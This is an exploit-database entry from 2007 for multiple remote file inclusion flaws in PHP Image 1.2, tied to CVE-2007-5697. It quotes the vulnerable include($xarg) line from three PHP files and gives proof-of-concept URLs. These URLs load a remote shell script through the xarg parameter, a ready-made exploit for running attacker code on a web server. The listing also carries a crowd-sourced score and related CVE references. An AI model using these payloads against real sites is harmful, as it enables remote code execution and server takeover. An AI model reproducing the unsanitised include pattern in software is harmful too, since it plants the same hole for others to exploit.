Lucene search
CiviEDB-ID:4565HistoryOct 23, 2007 - 12:00 a.m.
PHP Image 1.2 - Multiple Remote File Inclusions
2007-10-2300:00:00
Civi
www.exploit-db.com
18
AI Score
7.4
Confidence
Low
PHP Image v1.2 Multiple Remote File Inclusion
Download: http://www.phpimage.co.uk/phpimage_v_1_2.zip
Bug found by Civi
Vuln code in xarg_corner.php, xarg_corner_bottom.php, xarg_corner_top.php:
<td style="background-image: url(images/cor_top_fill.jpg);"><?php include($xarg); ?></td>
POC:
http://site/xarg_corner.php?xarg=http://shell.php?
http://site/xarg_corner_bottom.php?xarg=http://shell.php ?
http://site/xarg_corner_top.php?xarg=http://shell.php?
[Original Post: forum.darkc0de.com]
Tnx to: d3hydr8, str0ke
# milw0rm.com [2007-10-23]Related
cvelist
cvelist
CVE-2007-5697
2007-10-29 21:00:00
nvd
nvd
CVE-2007-5697
2007-10-29 21:46:00
cve
cve
CVE-2007-5697
2007-10-29 21:46:00
prion
prion
Remote file inclusion
2007-10-29 21:46:00